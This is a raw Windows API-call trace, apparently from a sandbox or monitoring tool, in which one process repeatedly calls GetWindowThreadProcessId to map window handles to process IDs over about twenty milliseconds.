	[0550.292] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xdd0
	[0550.292] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xd94
	[0550.293] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xd74
	[0550.293] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xd00
	[0550.293] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xcd8
	[0550.293] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xc84
	[0550.293] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xca4
	[0550.293] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xc64
	[0550.293] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xc24
	[0550.293] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xb84
	[0550.293] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xbac
	[0550.293] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x384
	[0550.294] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xab8
	[0550.294] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x33c
	[0550.294] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xa44
	[0550.294] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xa64
	[0550.294] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x8a8
	[0550.294] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xaf0
	[0550.294] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x88c
	[0550.294] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xb04
	[0550.294] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x910
	[0550.294] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x230
	[0550.294] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xac0
	[0550.295] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xab4
	[0550.295] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xaac
	[0550.295] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x3d0
	[0550.295] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x978
	[0550.295] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xa7c
	[0550.295] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x59c
	[0550.295] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xa88
	[0550.295] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xa6c
	[0550.295] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xa68
	[0550.295] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x9f8
	[0550.296] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xa04
	[0550.296] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x924
	[0550.296] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x8dc
	[0550.296] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x7dc
	[0550.296] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x768
	[0550.296] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x764
	[0550.296] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x820
	[0550.296] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x810
	[0550.296] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x794
	[0550.296] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x83c
	[0550.296] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x7ac
	[0550.297] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xb44
	[0550.297] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xb5c
	[0550.297] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x838
	[0550.297] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.297] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.297] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.297] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.297] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.298] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.298] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.298] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.298] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x818
	[0550.298] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x5b8
	[0550.298] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x494
	[0550.298] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1ec
	[0550.298] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x440
	[0550.298] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x7e8
	[0550.298] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x730
	[0550.298] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x2c8
	[0550.299] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x31c
	[0550.299] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x330
	[0550.299] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x128
	[0550.299] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x5c8
	[0550.299] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x6f8
	[0550.299] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x358
	[0550.299] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x73c
	[0550.299] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xb0
	[0550.299] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x250
	[0550.299] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x240
	[0550.300] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x790
	[0550.300] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x61c
	[0550.300] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x540
	[0550.300] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x538
	[0550.300] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x568
	[0550.300] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x538
	[0550.300] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x568
	[0550.300] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x538
	[0550.300] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x540
	[0550.301] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x540
	[0550.301] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x57c
	[0550.301] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x460
	[0550.301] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x554
	[0550.301] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.301] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x528
	[0550.301] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.301] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.302] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.302] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x79c
	[0550.302] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.302] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4e0
	[0550.302] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.302] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x460
	[0550.302] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x460
	[0550.302] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x44c
	[0550.302] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x778
	[0550.303] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x460
	[0550.303] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x558
	[0550.303] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.303] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x4d0
	[0550.303] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x19bc
	[0550.303] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x199c
	[0550.303] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1998
	[0550.303] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1994
	[0550.303] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1990
	[0550.304] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1984
	[0550.304] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x197c
	[0550.304] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1978
	[0550.304] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1824
	[0550.304] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1088
	[0550.304] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1908
	[0550.304] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x18cc
	[0550.304] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x18d0
	[0550.305] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1840
	[0550.305] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x10c4
	[0550.305] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x128c
	[0550.305] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x16e8
	[0550.305] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x16cc
	[0550.305] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x274
	[0550.305] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x10e0
	[0550.305] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x10cc
	[0550.306] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x10c0
	[0550.306] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x10d0
	[0550.306] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1198
	[0550.306] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1080
	[0550.306] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1074
	[0550.306] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x106c
	[0550.306] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1474
	[0550.306] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1414
	[0550.306] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xbd0
	[0550.307] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x550
	[0550.307] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xa38
	[0550.307] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x16d0
	[0550.307] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x16d4
	[0550.307] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x15bc
	[0550.307] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x15a0
	[0550.307] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x159c
	[0550.307] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1598
	[0550.308] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1594
	[0550.308] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1590
	[0550.308] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x158c
	[0550.308] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1588
	[0550.308] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1584
	[0550.308] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1580
	[0550.308] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x157c
	[0550.308] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1488
	[0550.308] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1404
	[0550.308] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x11b8
	[0550.309] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xbd4
	[0550.309] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xe0c
	[0550.309] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xd30
	[0550.309] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xe70
	[0550.309] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x13b8
	[0550.309] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xe20
	[0550.309] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xe2c
	[0550.309] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xe00
	[0550.309] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xe04
	[0550.309] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xc94
	[0550.309] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x13b0
	[0550.310] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x13ac
	[0550.310] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x13a8
	[0550.310] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1374
	[0550.310] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x132c
	[0550.310] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1328
	[0550.310] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x12d0
	[0550.310] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x12cc
	[0550.310] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x12c8
	[0550.310] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1290
	[0550.310] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1218
	[0550.310] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1214
	[0550.311] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x11ec
	[0550.311] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x11e8
	[0550.311] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x11cc
	[0550.311] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x1140
	[0550.311] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xe6c
	[0550.311] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0x6e8
	[0550.311] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xc6c
	[0550.311] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xf94
	[0550.311] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xffc
	[0550.311] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xf74
	[0550.312] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xf08
	[0550.312] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xf0c
	[0550.312] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xed8
	[0550.312] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xe90
	[0550.312] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xea8
	[0550.312] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xfa8
	[0550.312] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xfbc
	[0550.312] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xfb8
	[0550.312] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xfb4
	[0550.312] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xfb0
	[0550.312] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xfac
	[0550.313] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xfc0
	[0550.313] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xfd0
	[0550.313] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xf88
	[0550.313] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x10dde0 | out: lpdwProcessId=0x10dde0) returned 0xf84
